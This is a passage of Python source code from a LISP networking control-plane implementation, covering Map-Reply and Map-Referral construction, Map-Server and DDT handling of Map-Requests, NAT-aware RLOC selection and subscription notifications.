        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(
        probe))
    return

def lisp_process_smr(map_request):
    lprint("Received SMR-based Map-Request")
    return

def lisp_process_smr_invoked_request(map_request):
    lprint("Received SMR-invoked Map-Request")
    return

def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
    keys, enc, auth, mr_ttl=-1):

    probe_bit = map_request.rloc_probe if (map_request != None) else False
    json_telemetry = map_request.json_telemetry if (map_request != None) \
        else None

    map_reply = lisp_map_reply()
    map_reply.rloc_probe = probe_bit
    map_reply.echo_nonce_capable = enc
    map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
    map_reply.record_count = 1
    map_reply.nonce = nonce
    packet = map_reply.encode()
    map_reply.print_map_reply()

    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    if (json_telemetry != None): eid_record.rloc_count += 1
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group

    packet += eid_record.encode()
    eid_record.print_record("  ", False)

    local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()

    probed_rloc = None
    for rloc_entry in rloc_set:
        multicast = rloc_entry.rloc.is_multicast_address()
        rloc_record = lisp_rloc_record()
        probe = probe_bit and (multicast or json_telemetry == None)
        addr_str = rloc_entry.rloc.print_address_no_iid()
        if (addr_str in local_rlocs or multicast):
            rloc_record.local_bit = True
            rloc_record.probe_bit = probe
            rloc_record.keys = keys
            if (rloc_entry.priority == 254 and lisp_i_am_rtr):
                rloc_record.rloc_name = "RTR"

            if (probed_rloc == None): probed_rloc = rloc_entry.rloc

        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.reach_bit = True
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    #
    # Append a telemetry JSON RLOC-record when the Map-Request carried one.
    #
    if (json_telemetry != None):
        rloc_record = lisp_rloc_record()
        if (probed_rloc): rloc_record.rloc.copy_address(probed_rloc)
        rloc_record.local_bit = True
        rloc_record.probe_bit = True
        rloc_record.reach_bit = True
        if (lisp_i_am_rtr):
            rloc_record.priority = 254
            rloc_record.rloc_name = "RTR"

        telemetry = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
        rloc_record.json = lisp_json("telemetry", telemetry)
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    return(packet)

def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    eid_record = lisp_eid_record()

    ref_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        ref_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1

    eid_record.rloc_count = ref_count
    eid_record.authoritative = True

    #
    # When no action was supplied, derive it from the first delegation.
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NULL):
        if (ref_count == 0):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            ds_node = ddt_entry.delegation_set[0]
            if (ds_node.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL

            if (ds_node.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL

    #
    # The incomplete bit is set when this node is not authoritative for
    # the referral set.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (lisp_i_am_ms and ds_node.is_ms_peer() == False)

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record("  ", True)

    if (ref_count == 0): return(packet)

    for ds_node in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ds_node.delegate_address
        rloc_record.priority = ds_node.priority
        rloc_record.weight = ds_node.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    return(packet)

def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}".format(
            green(eid_str, False)))
        return

    db_str = db.print_eid_tuple()

    lprint("Found database-mapping EID-prefix {} for requested EID {}".format(
        green(db_str, False), green(eid_str, False)))

    #
    # Reply to the source of the Map-Request when the ITR-RLOC is a
    # private address and we are doing NAT-traversal.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp the telemetry data, if the Map-Request carried any.
    #
    json_telemetry = map_request.json_telemetry
    if (json_telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(json_telemetry,
            ei=etr_in_ts)

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)

    #
    # For RLOC-probes from an RTR (or with source port 0), encapsulate the
    # Map-Reply so it traverses the NAT.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        rtr = itr_rloc.print_address_no_iid()
        if (public and rtr in lisp_rtr_list or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return

def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    #
    # Reply to the first ITR-RLOC, or to the outer source when the ITR-RLOC
    # is a private (NATed) address.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address()): itr_rloc = source
    nonce = map_request.nonce

    eid = map_request.target_eid
    group = map_request.target_group

    rloc_set = []
    for my_rloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
        if (my_rloc == None): continue
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(my_rloc)
        rloc_entry.priority = 254
        rloc_set.append(rloc_entry)

    echo_nonce = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp outbound telemetry if the Map-Request carried any.
    #
    telemetry = map_request.json_telemetry
    if (telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(telemetry,
            ei=etr_in_ts)

    packet = lisp_build_map_reply(eid, group, rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, echo_nonce, True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
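#
# lisp_get_private_rloc_set
#
# Appears to return the registered private RLOCs for the target site when
# the requesting site sits behind the same NAT (the two sites register the
# same public RLOC) or is configured with the same site-id; otherwise the
# registered RLOC-set is returned unchanged.
#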
def lisp_get_private_rloc_set(target_site_eid, seid, group):
    rloc_set = target_site_eid.registered_rlocs

    source_site_eid = lisp_site_eid_lookup(seid, group, False)
    if (source_site_eid == None): return(rloc_set)

    #
    # Collect the target site's private RLOCs and find its first public
    # (non-RTR) RLOC.
    #
    target_rloc = None
    private_rloc_set = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            new_rloc = copy.deepcopy(rloc_entry)
            private_rloc_set.append(new_rloc)
            continue
        target_rloc = rloc_entry
        break

    if (target_rloc == None): return(rloc_set)
    target_rloc = target_rloc.rloc.print_address_no_iid()

    #
    # Find the source site's first public (non-RTR) RLOC.
    #
    source_rloc = None
    for rloc_entry in source_site_eid.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_rloc = rloc_entry
        break

    if (source_rloc == None): return(rloc_set)
    source_rloc = source_rloc.rloc.print_address_no_iid()

    #
    # With no site-id configured, compare public RLOCs to detect that both
    # sites are behind the same NAT.
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_rloc == target_rloc):
            lprint("Return private RLOCs for sites behind {}".format(
                target_rloc))
            return(private_rloc_set)
        return(rloc_set)

    if (site_id == source_site_eid.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(site_id))
        return(private_rloc_set)
    return(rloc_set)
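#
# lisp_get_partial_rloc_set
#
# Appears to split a registered RLOC-set into RTR RLOCs (priority 254) and
# ETR RLOCs, returning the subset appropriate for the requester: the ETR
# RLOCs when an RTR is asking, or the RTR RLOCs (plus IPv6 and private
# RLOCs) when an ITR is asking.
#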
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    rtr_list = []
    rloc_set = []

    #
    # Check if the Map-Request source is itself one of the registered RTRs
    # (RTR entries register with priority 254).
    #
    rtr_is_source = False
    rtr_in_set = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        rtr_in_set = True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        rtr_is_source = True
        break

    #
    # No RTRs registered, return the set untouched.
    #
    if (rtr_in_set == False): return(registered_rloc_set)

    #
    # When this system itself sits behind a NAT, suppress private RLOCs.
    #
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Partition the set into RTR RLOCs and usable ETR RLOCs.
    #
    for rloc_entry in registered_rloc_set:
        if (behind_nat and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)

    #
    # An RTR asked: give it the ETR RLOCs.
    #
    if (rtr_is_source): return(rloc_set)

    #
    # An ITR asked: give it IPv6 and private RLOCs plus the RTR RLOCs.
    #
    rloc_set = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
        if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)

    rloc_set += rtr_list
    return(rloc_set)
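#
# lisp_store_pubsub_state
#
# Seemingly creates and caches subscription state for an ITR that set the
# subscribe-bit, keyed by the EID-prefix it subscribed to.
#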
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
    pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
    pubsub.add(reply_eid)
    return(pubsub)
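#
# lisp_convert_reply_to_notify
#
# Rewrites an already encoded Map-Reply into a Map-Notify: same records and
# nonce, new type field, zeroed key-id/auth-length, as the code below
# suggests.
#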
def lisp_convert_reply_to_notify(packet):

    #
    # Grab the record count and nonce from the Map-Reply, then strip its
    # 12-byte header.
    #
    record_count = struct.unpack("I", packet[0:4])[0]
    record_count = socket.ntohl(record_count) & 0xff
    nonce = packet[4:12]
    packet = packet[12::]

    #
    # Build a Map-Notify header with the same record count and nonce and a
    # zeroed key-id/authentication-length field.
    #
    first_long = (LISP_MAP_NOTIFY << 28) | record_count
    header = struct.pack("I", socket.htonl(first_long))
    auth = struct.pack("I", 0)

    packet = header + nonce + auth + packet
    return(packet)
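#
# lisp_notify_subscribers
#
# Walks the pubsub cache and sends a Map-Notify to every subscriber whose
# subscribed EID-prefix covers the EID-prefix that was just registered,
# based on the loop below.
#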
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
    registered_eid, site):

    for eid_str in lisp_pubsub_cache:
        for pubsub in list(lisp_pubsub_cache[eid_str].values()):
            eid_prefix = pubsub.eid_prefix
            if (eid_prefix.is_more_specific(registered_eid) == False): continue

            itr = pubsub.itr
            port = pubsub.port
            itr_str = red(itr.print_address_no_iid(), False)
            sub_str = bold("subscriber", False)
            xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
            nonce = "0x" + lisp_hex_string(pubsub.nonce)

            lprint("    Notify {} {}:{} xtr-id {} for {}, nonce {}".format(
                sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))

            #
            # Send the Map-Notify with the registered EID-prefix replaced
            # by the subscribed EID-prefix.
            #
            record = copy.deepcopy(eid_record)
            record.eid.copy_address(eid_prefix)
            record = record.encode() + rloc_records
            lisp_build_map_notify(lisp_sockets, record, [eid_str], 1, itr,
                port, pubsub.nonce, 0, 0, 0, site, False)

            pubsub.map_notify_count += 1
    return
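#
# lisp_process_pubsub
#
# Handles a Map-Request with the subscribe-bit set: store subscription
# state, then ack the ITR with a Map-Notify converted from the Map-Reply
# that was already built.
#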
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
    ttl, xtr_id):

    #
    # Remember the subscription so later changes to the EID-prefix trigger
    # Map-Notify messages.
    #
    pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
        xtr_id)

    eid_str = green(reply_eid.print_prefix(), False)
    itr_str = red(itr_rloc.print_address_no_iid(), False)
    mn_str = bold("Map-Notify", False)
    xtr_id = "0x" + lisp_hex_string(xtr_id)
    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn_str,
        eid_str, itr_str, xtr_id))

    #
    # Convert the built Map-Reply into a Map-Notify and send it.
    #
    packet = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
    pubsub.map_notify_count += 1
    return
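#
# lisp_ms_process_map_request
#
# Evidently the Map-Server's Map-Request path: verify optional signatures,
# look the EID up in the site cache, then either proxy-reply (applying
# policy, NAT, and TTL adjustments) or forward the Map-Request to one of
# the registered ETRs. Returns [eid, group, ddt-action] so the caller can
# also send a Map-Referral for DDT requests.
#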
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    itr_rloc = map_request.itr_rlocs[0]
    xtr_id = map_request.xtr_id
    nonce = map_request.nonce
    action = LISP_NO_ACTION
    pubsub = map_request.subscribe_bit

    #
    # If the EID carries a crypto-hash, verify the Map-Request signature.
    #
    sig_good = True
    is_crypto_eid = (lisp_get_eid_hash(eid) != None)
    if (is_crypto_eid):
        sig = map_request.map_request_signature
        if (sig == None):
            sig_good = False
            lprint(("EID-crypto-hash signature verification {}, " +
                "no signature found").format(bold("failed", False)))
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))

            passfail = bold("passed", False) if sig_good else bold("failed", False)
            lprint("EID-crypto-hash signature verification {}".format(passfail))

    if (pubsub and sig_good == False):
        pubsub = False
        lprint("Suppress creating pubsub state due to signature failure")

    #
    # Reply to the ITR-RLOC unless its address family differs from the ECM
    # source, in which case reply to the ECM source.
    #
    reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source

    site_eid = lisp_site_eid_lookup(eid, group, False)

    if (site_eid == None or site_eid.is_star_g()):
        not_found = bold("Site not found", False)
        lprint("{} for requested EID {}".format(not_found,
            green(eid_str, False)))

        #
        # No site found, send a negative Map-Reply with a 15-minute TTL.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
            mr_sport, 15, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])

    site_eid_str = site_eid.print_eid_tuple()
    site_name = site_eid.site.site_name

    #
    # Verify the signature when the site requires signed Map-Requests.
    #
    if (is_crypto_eid == False and site_eid.require_signature):
        sig = map_request.map_request_signature
        sig_eid = map_request.signature_eid
        if (sig == None or sig_eid.is_null()):
            lprint("Signature required for site {}".format(site_name))
            sig_good = False
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))

            passfail = bold("passed", False) if sig_good else bold("failed", False)
            lprint("Required signature verification {}".format(passfail))

    if (sig_good and site_eid.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}".format(site_name, green(site_eid_str, False), green(eid_str, False)))

        #
        # If the matched entry does not accept more-specifics, return its
        # own prefix in the negative Map-Reply.
        #
        if (site_eid.accept_more_specifics == False):
            eid = site_eid.eid
            group = site_eid.group

        ttl = 1
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
            mr_sport, ttl, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])

    #
    # Decide whether this Map-Server proxy-replies.
    #
    nat_proxy_reply = False
    proxy_str = ""
    proxy_reply = False
    if (site_eid.force_nat_proxy_reply):
        proxy_str = ", nat-forced"
        nat_proxy_reply = True
        proxy_reply = True
    elif (site_eid.force_proxy_reply):
        proxy_str = ", forced"
        proxy_reply = True
    elif (site_eid.proxy_reply_requested):
        proxy_str = ", requested"
        proxy_reply = True
    elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
        proxy_str = ", drop-to-pitr"
        action = LISP_DROP_ACTION
    elif (site_eid.proxy_reply_action != ""):
        action = site_eid.proxy_reply_action
        proxy_str = ", forced, action {}".format(action)
        action = LISP_DROP_ACTION if (action == "drop") else LISP_NATIVE_FORWARD_ACTION

    #
    # Apply any policy configured for the site.
    #
    policy_drop = False
    policy = None
    if (proxy_reply and site_eid.policy in lisp_policies):
        p = lisp_policies[site_eid.policy]
        if (p.match_policy_map_request(map_request, mr_source)): policy = p

        if (policy):
            match_str = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(
                match_str, p.policy_name, p.set_action))
        else:
            match_str = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(
                match_str, p.policy_name))
            policy_drop = True

    if (proxy_str != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}".format(green(eid_str, False), site_name, green(site_eid_str, False),
            proxy_str))

        rloc_set = site_eid.registered_rlocs
        ttl = 1440
        if (nat_proxy_reply):
            if (site_eid.site_id != 0):
                source_eid = map_request.source_eid
                rloc_set = lisp_get_private_rloc_set(site_eid, source_eid,
                    group)
            if (rloc_set == site_eid.registered_rlocs):
                multicast = (site_eid.group.is_null() == False)
                new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest,
                    multicast)
                if (new_set != rloc_set):
                    ttl = 15
                    rloc_set = new_set

        #
        # Honor a configured TTL override.
        #
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000

        #
        # Policy can override the record TTL and the RLOC-set.
        #
        if (policy):
            if (policy.set_record_ttl):
                ttl = policy.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(ttl))
            if (policy.set_action == "drop"):
                lprint("Policy set-action drop, send negative Map-Reply")
                action = LISP_POLICY_DENIED_ACTION
                rloc_set = []
            else:
                rloc = policy.set_policy_map_reply()
                if (rloc): rloc_set = [rloc]

        if (policy_drop):
            lprint("Implied drop action, send negative Map-Reply")
            action = LISP_POLICY_DENIED_ACTION
            rloc_set = []

        echo_nonce = site_eid.echo_nonce_capable

        #
        # On signature failure, return an auth-failure action with an empty
        # RLOC-set for the requested EID.
        #
        if (sig_good):
            reply_eid = site_eid.eid
            reply_group = site_eid.group
        else:
            reply_eid = eid
            reply_group = group
            action = LISP_AUTH_FAILURE_ACTION
            rloc_set = []

        #
        # For subscription requests, echo the requested EID-prefix.
        #
        if (pubsub):
            reply_eid = eid
            reply_group = group

        packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
            nonce, action, ttl, map_request, None, echo_nonce, False)

        if (pubsub):
            lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
                mr_sport, nonce, ttl, xtr_id)
        else:
            lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)

        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    #
    # Not proxy-replying, forward the Map-Request to one of the registered
    # ETRs, chosen by hashing the source and target EIDs.
    #
    rloc_count = len(site_eid.registered_rlocs)
    if (rloc_count == 0):
        lprint(("Requested EID {} found site '{}' with EID-prefix {} with " +
            "no registered RLOCs").format(green(eid_str, False), site_name,
            green(site_eid_str, False)))
        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])

    hash_source = map_request.target_eid if map_request.source_eid.is_null() else map_request.source_eid

    hashval = map_request.target_eid.hash_address(hash_source)
    hashval %= rloc_count
    etr = site_eid.registered_rlocs[hashval]

    if (etr.rloc.is_null()):
        lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " +
            "EID-prefix {}, no RLOC address").format(green(eid_str, False),
            site_name, green(site_eid_str, False)))
    else:
        lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " +
            "EID-prefix {}").format(green(eid_str, False),
            red(etr.rloc.print_address(), False), site_name,
            green(site_eid_str, False)))

        #
        # ECM-encapsulate the Map-Request to the selected ETR.
        #
        lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
            map_request.target_eid, etr.rloc, to_etr=True)

    return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
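#
# lisp_ddt_process_map_request
#
# Looks like DDT-node (and Map-Server acting as DDT-node) handling of a
# Map-Request: pick a referral action and TTL from the site cache or the
# DDT delegation cache, then build and send a Map-Referral.
#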
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):

    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    nonce = map_request.nonce
    action = LISP_DDT_ACTION_NULL

    #
    # As a Map-Server, answer from the site cache; otherwise look in the
    # DDT cache for a delegation.
    #
    ddt_entry = None
    if (lisp_i_am_ms):
        site_eid = lisp_site_eid_lookup(eid, group, False)
        if (site_eid == None): return

        if (site_eid.registered):
            action = LISP_DDT_ACTION_MS_ACK
            ttl = 1440
        else:
            eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
            action = LISP_DDT_ACTION_MS_NOT_REG
            ttl = 1
    else:
        ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
        if (ddt_entry == None):
            action = LISP_DDT_ACTION_NOT_AUTH
            ttl = 0
            lprint("DDT delegation entry not found for EID {}".format(
                green(eid_str, False)))
        elif (ddt_entry.is_auth_prefix()):

            #
            # An authoritative-prefix covers the EID but no delegation
            # exists, compute the least-specific covering prefix for the
            # negative Map-Referral.
            #
            action = LISP_DDT_ACTION_DELEGATION_HOLE
            ttl = 15
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " +
                "found for EID {}").format(auth_prefix_str,
                green(eid_str, False)))

            if (group.is_null()):
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    lisp_ddt_cache)
            else:
                group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
                    lisp_ddt_cache)
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    ddt_entry.source_cache)

            ddt_entry = None
        else:
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format(
                auth_prefix_str, green(eid_str, False)))
            ttl = 1440

    #
    # Build and send the Map-Referral. Use the well-known control port
    # unless the upper nonce bits carry the internal lig marker.
    #
    packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
    nonce_high = map_request.nonce >> 32
    if (map_request.nonce != 0 and nonce_high != 0xdfdf0e1d): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
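#
# lisp_find_negative_mask_len
#
# Widens neg_prefix.mask_len to cover the first (highest-order) bit where
# eid and entry_prefix differ; hash_address() appears to return the XOR of
# the two addresses, so the first set bit is the first differing bit.
#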
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
    diff_bits = eid.hash_address(entry_prefix)
    address_size = eid.addr_length() * 8
    mask_len = 0

    #
    # Walk down from the high-order bit to the first bit that differs.
    #
    for mask_len in range(address_size):
        bit = 1 << (address_size - mask_len - 1)
        if (diff_bits & bit): break

    if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
    return
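#
# lisp_neg_prefix_walk
#
# walk_cache() callback that widens the negative prefix for each cache
# entry under the auth-prefix, or, with no auth-prefix, for each entry with
# the same instance-id and address family.
#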
def lisp_neg_prefix_walk(entry, parms):
    eid, auth_prefix, neg_prefix = parms

    if (auth_prefix == None):
        if (entry.eid.instance_id != eid.instance_id):
            return([True, parms])
        if (entry.eid.afi != eid.afi): return([True, parms])
    else:
        if (entry.eid.is_more_specific(auth_prefix) == False):
            return([True, parms])

    #
    # Widen the negative prefix mask so it does not cover this entry.
    #
    lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
    return([True, parms])
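#
# lisp_ddt_compute_neg_prefix
#
# Computes the least-specific prefix that covers the requested EID but no
# configured delegation, for use in negative Map-Referrals.
#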
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):

    #
    # Non-binary EIDs (distinguished-names, for instance) are returned
    # as-is.
    #
    if (eid.is_binary() == False): return(eid)

    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0

    auth_prefix_str = ddt_entry.print_eid_tuple()
    auth_prefix = ddt_entry.eid

    #
    # Walk the cache, widening the mask until the negative prefix covers
    # no configured delegation.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    #
    # Zero the host bits beyond the computed mask length.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(), False),
        auth_prefix_str, neg_prefix.print_prefix()))
    return(neg_prefix)
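#
# lisp_ms_compute_neg_prefix
#
# Map-Server variant of the negative-prefix computation: handles (S,G)
# lookups as well and returns [neg-prefix, neg-group, referral-action].
#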
def lisp_ms_compute_neg_prefix(eid, group):
    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0
    neg_group = lisp_address(group.afi, "", 0, 0)
    neg_group.copy_address(group)
    neg_group.mask_len = 0
    auth_prefix = None

    #
    # Find the authoritative prefix in the DDT cache. Without one, return
    # host-based prefixes and a not-authoritative action.
    #
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            neg_group.mask_len = neg_group.host_mask_len()
            return([neg_prefix, neg_group, LISP_DDT_ACTION_NOT_AUTH])

        cache = lisp_sites_by_eid
        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
    else:
        ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            neg_group.mask_len = neg_group.host_mask_len()
            return([neg_prefix, neg_group, LISP_DDT_ACTION_NOT_AUTH])

        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group

        group, auth_prefix, neg_group = lisp_sites_by_eid.walk_cache(
            lisp_neg_prefix_walk, (group, auth_prefix, neg_group))

        neg_group.mask_address(neg_group.mask_len)

        lprint(("Least specific prefix computed from site-cache for " +
            "group EID {} using auth-prefix {} is {}").format(
            group.print_address(),
            auth_prefix.print_prefix() if (auth_prefix != None) else "'not found'",
            neg_group.print_prefix()))

        cache = ddt_entry.source_cache

    #
    # The referral action depends on whether an auth-prefix was found.
    #
    action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else LISP_DDT_ACTION_NOT_AUTH

    #
    # Walk the site cache to widen the negative EID-prefix.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from site-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(), False),
        auth_prefix.print_prefix() if (auth_prefix != None) else "'not found'",
        neg_prefix.print_prefix()))

    return([neg_prefix, neg_group, action])
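#
# lisp_ms_send_map_referral
#
# Builds and sends a Map-Referral for the given referral action: one
# EID-record plus one RLOC-record per delegate, with action-specific TTLs,
# judging by the code below.
#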
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):

    eid = map_request.target_eid
    group = map_request.target_group
    nonce = map_request.nonce

    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440

    #
    # Build the Map-Referral header.
    #
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    incomplete = False

    #
    # When no site was found, compute the negative prefix; then set the
    # record TTL for each action.
    #
    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
            group)
        ttl = 15

